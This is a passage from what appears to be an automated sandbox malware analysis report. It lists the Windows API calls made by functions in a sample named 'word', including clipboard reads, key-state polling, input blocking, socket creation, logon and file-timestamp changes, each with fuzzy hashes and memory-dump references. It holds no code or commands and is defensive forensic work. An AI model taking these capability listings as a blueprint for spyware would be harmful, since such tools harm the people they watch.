                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                    • String ID: *.*
                                                                    • API String ID: 2693929171-438819550
                                                                    • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                    • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                    • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                    • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                    APIs
                                                                    • OpenClipboard.USER32(?), ref: 0046C635
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                    • GetClipboardData.USER32 ref: 0046C64F
                                                                    • CloseClipboard.USER32 ref: 0046C65D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                    • CloseClipboard.USER32 ref: 0046C692
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                    • GetClipboardData.USER32 ref: 0046C6DD
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                    • CloseClipboard.USER32 ref: 0046C866
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                    • String ID: HH
                                                                    • API String ID: 589737431-2761332787
                                                                    • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                    • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                    • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                    • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                    APIs
                                                                    • __wcsicoll.LIBCMT ref: 0043643C
                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                    • __wcsicoll.LIBCMT ref: 00436466
                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicollmouse_event
                                                                    • String ID: DOWN
                                                                    • API String ID: 1033544147-711622031
                                                                    • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                    • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                    • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                    • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                    APIs
                                                                      • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 4170576061-0
                                                                    • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                    • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                    • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                    • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                    APIs
                                                                    • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                    • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                    • GetAsyncKeyState.USER32 ref: 004563D0
                                                                    • GetAsyncKeyState.USER32 ref: 004563DC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 3539004672-0
                                                                    • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                    • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                    • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                    • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                    APIs
                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                    • IsWindowVisible.USER32 ref: 00477314
                                                                    • IsWindowEnabled.USER32 ref: 00477324
                                                                    • GetForegroundWindow.USER32 ref: 00477331
                                                                    • IsIconic.USER32 ref: 0047733F
                                                                    • IsZoomed.USER32 ref: 0047734D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                    • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                    • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                    • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00436D4F
                                                                    • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00436D93
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                    • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                    • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                    • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$VUUU$VUUU$VUUU
                                                                    • API String ID: 0-2165971703
                                                                    • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                    • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                    • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                    • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: 173bf69461bb034ef9d41469b93a245aedcb7a135fc36915bf61b313f160ac15
                                                                    • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                    • Opcode Fuzzy Hash: 173bf69461bb034ef9d41469b93a245aedcb7a135fc36915bf61b313f160ac15
                                                                    • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                    • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                    • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                    • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                    • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                    • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 004433A2
                                                                      • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                      • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID: rJ
                                                                    • API String ID: 2893107130-1865492326
                                                                    • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                    • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                    • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                    • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 004433A2
                                                                      • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                      • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID: rJ
                                                                    • API String ID: 2893107130-1865492326
                                                                    • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                    • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                    • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                    • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                    • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                    • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                    • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                    • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0vH$HH
                                                                    • API String ID: 0-728391547
                                                                    • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                    • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                    • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                    • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                    • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                    • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                    • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                    APIs
                                                                    • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Proc
                                                                    • String ID:
                                                                    • API String ID: 2346855178-0
                                                                    • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                    • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                    • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                    • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                    • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                    • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                    • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                    • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                    • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                    • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
